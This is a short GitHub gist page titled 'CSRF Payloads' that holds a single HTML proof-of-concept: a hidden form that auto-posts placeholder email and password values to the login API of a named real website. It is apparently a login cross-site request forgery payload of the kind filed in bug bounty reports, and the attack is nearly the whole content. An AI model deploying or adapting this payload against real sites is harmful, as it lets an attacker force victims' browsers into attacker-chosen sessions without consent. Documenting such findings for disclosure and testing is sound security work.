Created
September 7, 2019 17:43
-
-
Save hackerhumble/04c3e3fc0a3621a68329a6c0c50f51ba to your computer and use it in GitHub Desktop.
CSRF Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
**Sample CSRF Payload** | |
<html> | |
<body> | |
<form action="https://unikrn.com/apiv1/login" method="POST"> | |
<input type="hidden" name="usr" value="[email]"> | |
<input type="hidden" name="pwd" value="[password]"> | |
<input type="submit" value="Submit request" /> | |
</form> | |
</body> | |
</html> | |
----------------------------------------------------------- | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment